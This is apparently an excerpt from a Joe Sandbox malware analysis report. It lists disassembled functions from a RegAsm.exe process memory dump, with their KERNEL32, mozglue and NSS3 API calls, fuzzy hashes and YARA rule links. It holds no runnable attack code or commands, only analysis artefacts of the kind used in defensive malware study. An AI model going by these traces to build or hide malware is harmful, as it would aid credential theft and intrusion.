                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: freemalloc
                                                                                    • String ID:
                                                                                    • API String ID: 3061335427-0
                                                                                    • Opcode ID: f8ba86d1d1e1de648e24742d604f486eb4abb4ee1e17eb6949d66aff11713945
                                                                                    • Instruction ID: 0f7d0d423d1ad9f97f33597df31427babf499a056e1dcd41c4756e7a842764cb
                                                                                    • Opcode Fuzzy Hash: f8ba86d1d1e1de648e24742d604f486eb4abb4ee1e17eb6949d66aff11713945
                                                                                    • Instruction Fuzzy Hash: A151BBB1A00A069FEB14CFA8D8807AEB7B5FF49308F208539D616D7715F731AA19CB51
                                                                                    Function 6CC827E0 Relevance: 7.6, APIs: 6, Instructions: 136COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6CC82620,?,?,?,6CC760AA,6CC75FCB,6CC779A3), ref: 6CC8284D
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6CC82620,?,?,?,6CC760AA,6CC75FCB,6CC779A3), ref: 6CC8289A
                                                                                    • free.MOZGLUE(?,?,?,6CC82620,?,?,?,6CC760AA,6CC75FCB,6CC779A3), ref: 6CC828F1
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6CC82620,?,?,?,6CC760AA,6CC75FCB,6CC779A3), ref: 6CC82910
                                                                                    • free.MOZGLUE(00000001,?,?,6CC82620,?,?,?,6CC760AA,6CC75FCB,6CC779A3), ref: 6CC8293C
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00200000,?,?,6CC82620,?,?,?,6CC760AA,6CC75FCB,6CC779A3), ref: 6CC8294E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: freemalloc
                                                                                    • String ID:
                                                                                    • API String ID: 3061335427-0
                                                                                    • Opcode ID: d51013bc4175baa451af49b4aa102f09a6bd09a68578f220f25933a2646bc7a9
                                                                                    • Instruction ID: 41aeed2eae40dc61875893e2712f1ec6518153438c2b34b42fc713fc613a7413
                                                                                    • Opcode Fuzzy Hash: d51013bc4175baa451af49b4aa102f09a6bd09a68578f220f25933a2646bc7a9
                                                                                    • Instruction Fuzzy Hash: A141AFB1A012068FEB14CF68D89876B7BF6EB45308F250939D956EB740F731E905CB61
                                                                                    Function 6CC3CFE0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 134memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(6CCBE784), ref: 6CC3CFF6
                                                                                    • LeaveCriticalSection.KERNEL32(6CCBE784), ref: 6CC3D026
                                                                                    • VirtualAlloc.KERNEL32(00000000,00100000,00001000,00000004), ref: 6CC3D06C
                                                                                    • VirtualFree.KERNEL32(00000000,00100000,00004000), ref: 6CC3D139
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSectionVirtual$AllocEnterFreeLeave
                                                                                    • String ID: MOZ_CRASH()
                                                                                    • API String ID: 1090480015-2608361144
                                                                                    • Opcode ID: 13b19b7ea74258da696513d70c52981f426b789ea78fd624b888345ac9e239f2
                                                                                    • Instruction ID: 1d1fe39b57e9816c8628aa655bad432dc5f080289bf79c42a6fb95dad84e9059
                                                                                    • Opcode Fuzzy Hash: 13b19b7ea74258da696513d70c52981f426b789ea78fd624b888345ac9e239f2
                                                                                    • Instruction Fuzzy Hash: 1941BE72B113264FDB048EBD9D943AA76B0EB49B14F24013DEA19F7784E7B59C018BC8
                                                                                    Function 6CC34DE0 Relevance: 7.6, APIs: 5, Instructions: 133stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6CC34E5A
                                                                                    • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6CC34E97
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CC34EE9
                                                                                    • memcpy.VCRUNTIME140(?,?,00000000), ref: 6CC34F02
                                                                                    • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6CC34F1E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
                                                                                    • String ID:
                                                                                    • API String ID: 713647276-0
                                                                                    • Opcode ID: 211b947d8446e0edfccbaff786d33c418f2b2d5a631f6567252523424394b90c
                                                                                    • Instruction ID: e4f3eb7713e0872eb3c081d0f68176fdd85a4310c73e7e28641e02e56747ae65
                                                                                    • Opcode Fuzzy Hash: 211b947d8446e0edfccbaff786d33c418f2b2d5a631f6567252523424394b90c
                                                                                    • Instruction Fuzzy Hash: F941E071608B119FC701CF69D88095BFBE4BF89344F149A2DF46987781EB32E958CB91
                                                                                    Function 6CC9A820 Relevance: 7.6, APIs: 5, Instructions: 106stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(6CCBF770), ref: 6CC9A858
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CC9A87B
                                                                                      • Part of subcall function 6CC9A9D0: memcpy.VCRUNTIME140(?,?,00000400,?,?,?,6CC9A88F,00000000), ref: 6CC9A9F1
                                                                                    • _ltoa_s.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,00000020,0000000A), ref: 6CC9A8FF
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CC9A90C
                                                                                    • LeaveCriticalSection.KERNEL32(6CCBF770), ref: 6CC9A97E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSectionstrlen$EnterLeave_ltoa_smemcpy
                                                                                    • String ID:
                                                                                    • API String ID: 1355178011-0
                                                                                    • Opcode ID: ace17e2cdaa41b462901068939d8770369d452a6eb4e6e9fd69b426e84319e8a
                                                                                    • Instruction ID: 19675898b83399db239e5b88cd89347c485339591f4c317e569bb437d40a62ba
                                                                                    • Opcode Fuzzy Hash: ace17e2cdaa41b462901068939d8770369d452a6eb4e6e9fd69b426e84319e8a
                                                                                    • Instruction Fuzzy Hash: D041A1B5E002089FDB00DFE8D885BDEB771FF44324F148629E826AB791E731A945CB91
                                                                                    Function 6CC41530 Relevance: 7.6, APIs: 5, Instructions: 98COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • moz_xmalloc.MOZGLUE(-00000002,?,6CC4152B,?,?,?,?,6CC41248,?), ref: 6CC4159C
                                                                                    • memcpy.VCRUNTIME140(00000023,?,?,?,?,6CC4152B,?,?,?,?,6CC41248,?), ref: 6CC415BC
                                                                                    • moz_xmalloc.MOZGLUE(-00000001,?,6CC4152B,?,?,?,?,6CC41248,?), ref: 6CC415E7
                                                                                    • free.MOZGLUE(?,?,?,?,?,?,6CC4152B,?,?,?,?,6CC41248,?), ref: 6CC41606
                                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6CC4152B,?,?,?,?,6CC41248,?), ref: 6CC41637
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
                                                                                    • String ID:
                                                                                    • API String ID: 733145618-0
                                                                                    • Opcode ID: eb4634277809461e843276b5e188d1b364c5ce903a71c98c27deeefc60d37ec4
                                                                                    • Instruction ID: f9d7c31c209c4dde9b9054c7e0e45ccc133a1c05bdd6d021715f603d13809219
                                                                                    • Opcode Fuzzy Hash: eb4634277809461e843276b5e188d1b364c5ce903a71c98c27deeefc60d37ec4
                                                                                    • Instruction Fuzzy Hash: 4F31C472A005148BCB188E6CD8504AE77A9FB81374724CB2DE863DBBD4FB30D9258791
                                                                                    Function 6CC9AD70 Relevance: 7.6, APIs: 5, Instructions: 93COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6CCAE330,?,6CC5C059), ref: 6CC9AD9D
                                                                                      • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6CCAE330,?,6CC5C059), ref: 6CC9ADAC
                                                                                    • free.MOZGLUE(?,?,?,?,00000000,?,?,6CCAE330,?,6CC5C059), ref: 6CC9AE01
                                                                                    • GetLastError.KERNEL32(?,00000000,?,?,6CCAE330,?,6CC5C059), ref: 6CC9AE1D
                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6CCAE330,?,6CC5C059), ref: 6CC9AE3D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$freemallocmemsetmoz_xmalloc
                                                                                    • String ID:
                                                                                    • API String ID: 3161513745-0
                                                                                    • Opcode ID: 0f94aed9f9e8288490c45f0ea3bcf18d7880e5fefac2d99d93fd19e8b59f146f
                                                                                    • Instruction ID: 10bcaa02354316226cd1011811b6f6cbe3df86acbd64ce16145a3b48d94a418c
                                                                                    • Opcode Fuzzy Hash: 0f94aed9f9e8288490c45f0ea3bcf18d7880e5fefac2d99d93fd19e8b59f146f
                                                                                    • Instruction Fuzzy Hash: 8A3141B1E002159FDB10DF768D44AABB7F8EF88614F158429E94AE7710F7349815CBA0
                                                                                    Function 6CC95EF0 Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP140(00000001,00000000,6CCADCA0,?,?,?,6CC6E8B5,00000000), ref: 6CC95F1F
                                                                                    • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6CC6E8B5,00000000), ref: 6CC95F4B
                                                                                    • ?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(00000000,?,6CC6E8B5,00000000), ref: 6CC95F7B
                                                                                    • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(6E65475B,00000000,?,6CC6E8B5,00000000), ref: 6CC95F9F
                                                                                    • ?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6CC6E8B5,00000000), ref: 6CC95FD6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@?sbumpc@?$basic_streambuf@?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@Ipfx@?$basic_istream@
                                                                                    • String ID:
                                                                                    • API String ID: 1389714915-0
                                                                                    • Opcode ID: e7588edcbaa0a170840b6dbae2fd1eec7656ed757fee815f605c82653f67b067
                                                                                    • Instruction ID: 34b0596da560ceb680a59a4dc4ec3b858fa18c257579680ec46a11c68e7b1d2e
                                                                                    • Opcode Fuzzy Hash: e7588edcbaa0a170840b6dbae2fd1eec7656ed757fee815f605c82653f67b067
                                                                                    • Instruction Fuzzy Hash: 7231FA353006008FD714CF69C898E2AB7F5FF89329B648698E5578BB95D735EC41CB80
                                                                                    Function 00411056 Relevance: 7.6, APIs: 5, Instructions: 88COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0041105B
                                                                                    • memset.MSVCRT ref: 0041107D
                                                                                      • Part of subcall function 00410CAC: GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,004110AA,00000000,?,00000000,?), ref: 00410CB7
                                                                                      • Part of subcall function 00410CAC: HeapAlloc.KERNEL32(00000000,?,004110AA,00000000,?,00000000,?), ref: 00410CBE
                                                                                      • Part of subcall function 00410CAC: wsprintfW.USER32 ref: 00410CCF
                                                                                    • OpenProcess.KERNEL32(00001001,00000000,?,?,?,?,00000000,?), ref: 00411104
                                                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000000,?), ref: 00411112
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 00411119
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Process$Heap$AllocCloseH_prologHandleOpenTerminatememsetwsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 1628159694-0
                                                                                    • Opcode ID: eda3bebae7e381b0fd502df677cdf661e45432fec2b6010a7c0ff375d6191211
                                                                                    • Instruction ID: 36bd9fcb495497175832ad1b73d2d45116fcd412ea3aab7de57d6fc10e614e88
                                                                                    • Opcode Fuzzy Hash: eda3bebae7e381b0fd502df677cdf661e45432fec2b6010a7c0ff375d6191211
                                                                                    • Instruction Fuzzy Hash: 31314C72D01128ABCB21EB90DD85DEFBB79FF09350F10012AF645E2190DB345A85CBE4
                                                                                    Function 6CC3B4C0 Relevance: 7.6, APIs: 5, Instructions: 84COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 6CC3B532
                                                                                    • moz_xmalloc.MOZGLUE(?), ref: 6CC3B55B
                                                                                    • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CC3B56B
                                                                                    • wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6CC3B57E
                                                                                    • free.MOZGLUE(00000000), ref: 6CC3B58F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
                                                                                    • String ID:
                                                                                    • API String ID: 4244350000-0
                                                                                    • Opcode ID: a7267d40d4e58b96ca0b8d01cf80bd40bc9dfe84475cd246c8b6c53e5130c21e
                                                                                    • Instruction ID: ec7394e26f6af462654aa3d55240f11a59f7427cbfa27b1916e3aad7d49cc969
                                                                                    • Opcode Fuzzy Hash: a7267d40d4e58b96ca0b8d01cf80bd40bc9dfe84475cd246c8b6c53e5130c21e
                                                                                    • Instruction Fuzzy Hash: 5521F371A006159BDB008FA9DC50BAABBB9FF82308F284129E818DB351F776D911C7A1
                                                                                    Function 6CC3B7A0 Relevance: 7.6, APIs: 5, Instructions: 77COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6CC3B7CF
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6CC3B808
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6CC3B82C
                                                                                    • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CC3B840
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC3B849
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$?vprint@PrintfTarget@mozilla@@mallocmemcpy
                                                                                    • String ID:
                                                                                    • API String ID: 1977084945-0
                                                                                    • Opcode ID: f1319bff4e95f53fa76cc96369157c95abb7e7693c04a81c7e1539ade2311b1e
                                                                                    • Instruction ID: f07fee85d804abcb855766203105fbb01820bee1acd53d3a78701083a414295e
                                                                                    • Opcode Fuzzy Hash: f1319bff4e95f53fa76cc96369157c95abb7e7693c04a81c7e1539ade2311b1e
                                                                                    • Instruction Fuzzy Hash: 71215CB0E002199FDF04DFA9D8956FEBBB4EF49314F14812AEC09A7301E731A945CBA1
                                                                                    Function 6CC96E50 Relevance: 7.6, APIs: 5, Instructions: 72COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6CC96E78
                                                                                      • Part of subcall function 6CC96A10: InitializeCriticalSection.KERNEL32(6CCBF618), ref: 6CC96A68
                                                                                      • Part of subcall function 6CC96A10: GetCurrentProcess.KERNEL32 ref: 6CC96A7D
                                                                                      • Part of subcall function 6CC96A10: GetCurrentProcess.KERNEL32 ref: 6CC96AA1
                                                                                      • Part of subcall function 6CC96A10: EnterCriticalSection.KERNEL32(6CCBF618), ref: 6CC96AAE
                                                                                      • Part of subcall function 6CC96A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6CC96AE1
                                                                                      • Part of subcall function 6CC96A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6CC96B15
                                                                                      • Part of subcall function 6CC96A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6CC96B65
                                                                                      • Part of subcall function 6CC96A10: LeaveCriticalSection.KERNEL32(6CCBF618,?,?), ref: 6CC96B83
                                                                                    • MozFormatCodeAddress.MOZGLUE ref: 6CC96EC1
                                                                                    • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6CC96EE1
                                                                                    • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6CC96EED
                                                                                    • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000400), ref: 6CC96EFF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSectionstrncpy$AddressCodeCurrentProcess$DescribeEnterFormatInitializeLeave_fileno_writefflush
                                                                                    • String ID:
                                                                                    • API String ID: 4058739482-0
                                                                                    • Opcode ID: ffc7b7037d56f8755ae055590ba618592c91af8562615bd6d2346920a0f4cab1
                                                                                    • Instruction ID: a57dc33438f244fa5b2747a81dd1b61cd68f54e01f44fee7fec404bd645f37af
                                                                                    • Opcode Fuzzy Hash: ffc7b7037d56f8755ae055590ba618592c91af8562615bd6d2346920a0f4cab1
                                                                                    • Instruction Fuzzy Hash: 0921A171A0421A9FDF00CF69D8C569A77F9EF84348F044039F80997281EB749A59CF96
                                                                                    Function 6CC976C0 Relevance: 7.6, APIs: 5, Instructions: 64COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • WideCharToMultiByte.KERNEL32 ref: 6CC976F2
                                                                                    • moz_xmalloc.MOZGLUE(00000001), ref: 6CC97705
                                                                                      • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CC97717
                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,6CC9778F,00000000,00000000,00000000,00000000), ref: 6CC97731
                                                                                    • free.MOZGLUE(00000000), ref: 6CC97760
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide$freemallocmemsetmoz_xmalloc
                                                                                    • String ID:
                                                                                    • API String ID: 2538299546-0
                                                                                    • Opcode ID: c1d42f421a75238e29698f85162fefd56720058de8ef4295d3f38264597f064c
                                                                                    • Instruction ID: ec5619616940050764c40aed78584840899dba168bdd5cf3944f8c675c2ebf2b
                                                                                    • Opcode Fuzzy Hash: c1d42f421a75238e29698f85162fefd56720058de8ef4295d3f38264597f064c
                                                                                    • Instruction Fuzzy Hash: E511C4B1901215ABE710AFB68C44BABBFF8EF45354F044529F848E7300F771985487E2
                                                                                    Function 6CDE2CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 6CDE5B40: PR_GetIdentitiesLayer.NSS3 ref: 6CDE5B56
                                                                                    • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CDE2CEC
